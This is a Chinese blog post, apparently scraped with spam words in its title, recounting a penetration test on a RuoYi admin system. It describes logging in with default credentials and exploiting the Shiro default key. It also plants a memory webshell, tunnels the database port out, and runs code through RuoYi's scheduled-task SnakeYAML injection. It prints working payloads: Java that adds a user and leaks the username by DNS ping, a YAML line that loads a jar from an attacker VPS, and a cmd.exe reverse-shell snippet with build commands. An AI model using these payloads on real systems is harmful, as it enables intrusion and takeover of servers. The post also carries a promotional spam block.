迅速让一个wordpress,seo排名怎么做,宽屏网站设计,写作网站都有哪些ppp前言
最近客户开始hw前的风险排查#xff0c;让我们帮他做个渗透测试#xff0c;只给一个单位名称。通过前期的信息收集#xff0c;发现了这个站点#xff1a; 没有验证码#xff0c;再加上这个图标#xff0c;吸引了我注意#xff1a; 从弱口令开始
若依默认口令为ad…前言
最近客户开始hw前的风险排查让我们帮他做个渗透测试只给一个单位名称。通过前期的信息收集发现了这个站点 没有验证码再加上这个图标吸引了我注意 从弱口令开始
若依默认口令为admin/admin123结果真的直接进了。 管理员权限直接上工具探测一下是否有若依的几个漏洞 工具链接GitHub - thelostworldFree/Ruoyi-All: 若依后台定时任务一键利用
还得是运气啊原本想着直接用这个工具一键穿的但是奈何没利用过若依的洞这个工具也不会使用。后续去查看了几篇文章需要上传jar包该漏洞可通过定时任务去调用执行jar包。
帮助网安学习全套资料S信免费领取 ① 网安学习成长路径思维导图 ② 60网安经典常用工具包 ③ 100SRC分析报告 ④ 150网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集含答案 ⑧ APP客户端安全检测指南安卓IOS
文章地址若依系统前后台漏洞大全_若依漏洞_LeYuuuuuuu的博客-CSDN博客
然后坑来了。按照教程去实践发现怎么样也无法执行漏洞。以下是java代码 public AwesomeScriptEngineFactory() {\try {\Runtime.getRuntime().exec(\net user test test123 /add\);\Runtime.getRuntime().exec(\ping tttt.ogjxcqvtbf.dnstunnel.run\);\Runtime.getRuntime().exec(\ping%USERNAME%.ogjxcqvtbf.dnstunnel.run\);\}catch (IOException e) {\e.printStackTrace();\}\
} 还得从shiro入手
尝试了一下午后想想算了看看有没有别的洞吧。刚好文章里面有写到ruoyi的shiro存在默认密钥结果一尝试还真的存在。Ps这边有个坑我用文章里面提到的LiqunKit去尝试无法执行命令。后续用了shiro_attack成功命令执行 然后通过shiro写入内存马 对内存马感兴趣的可以看下这两篇文章
一文了解内存马 - 码农教程
学习了解内存马看这篇就够了精华版_内存马怎么处理_MachineGunJoe的博客-CSDN博客
但是可惜这是一台云主机整个内网就一台主机。很多人可能看到esc就不想再打了。不过我还是去翻了一下文件夹把数据库账号也拉下来。 这个项目很奇怪我找到的项目路径下全是jar包我都怀疑这个是不是web目录。在基础信息里面找到了路径
catalina.home C:\Users\Administrator\AppData\Local\Temp\2\tomcat.937421519914311975.808
但是进入该路径下发现没文件不知道是不是权限不够。 可以看到这边只限制127.0.0.1的ip访问这就很尴尬所以这边我使用ligolo代理3306出来成功进行连接 工具链接GitHub - FunnyWolf/ligolo: Ligolo : 用于内网渗透的反向隧道
其实也尝试过添加用户但是貌似被拦截了。原本想用哥斯拉的内存马进行一键提权的但是不知道为什么哥斯拉的内存马一直连接不上。有大佬懂的还望不吝赐教。 再战定时任务
但是对于定时任务没复现出来我还是很执着通过查看其它大佬写的文章发现了原来这个jar包的代码有问题windows和linux的命令执行不一样windows没办法直接通过exec执行需要调用cmd进程进行执行。后续参考了这篇文章
https://www.cnblogs.com/BOHB-yunying/p/15661384.html
配置完后后台添加定时任务
org.yaml.snakeyaml.Yaml.load(!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL
[http://vpsip:8000/yaml-payload.jar]]]])
Java部分源码
-----------------------------------------------------------------------| String hostip; || || int port 6767; || || String cmdcmd.exe; || || Process pnew || ProcessBuilder(cmd).redirectErrorStream(true).start(); || || java.net.Socket snew java.net.Socket(host,port); || || java.io.InputStream || pip.getInputStream(),pep.getErrorStream(),sis.getInputStream(); || || java.io.OutputStream || pop.getOutputStream(),sos.getOutputStream(); |-----------------------------------------------------------------------
然后通过以下命令编译并打包为jar包
-----------------------------------------------------------------------| javac src/artsploit/AwesomeScriptEngineFactory.java //编译java文件 || || jar -cvf yaml-payload.jar -C src/ . //打包jar包 |-----------------------------------------------------------------------
成功反弹shell到我vps上 总结与思考
其实如果整片文章看下来可能会觉得比较顺利但是其实踩了很多坑以下是我自己的总结也和大家分享一下 冰蝎多版本不支持shiro_attack生成的内存马目前发现3.0Beta9版本修复版支持 若依的定时任务java代码执行Linux和windows的执行代码是不同的windows需要调用cmd进程去执行才导致一直测试不成功 冰蝎自带的socks代理和数据库工具很难用经常出现奇奇怪怪的问题。可以使用第三方工具。如ligolo把数据库端口映射出来再去访问登录。我就是用自带的数据库管理工具连不上然后socks代理也连不上才使用第三方工具的 netuser添加用户失败大概率是权限不足或者杀软拦截了。上线后可以先tasklist查看是否有杀软。其实就是和渗透前的信息收集一样上线后也要收集一下当前服务器的信息 遇到渗透的效果和自己预想的不一样的情况要学会排查猜测问题的原因。如我本次代理3306端口出来一直去尝试账号密码登录但是一直登录不上。排查了一圈才发现当时为了安全起见把我的代理端口限制IP访问了。
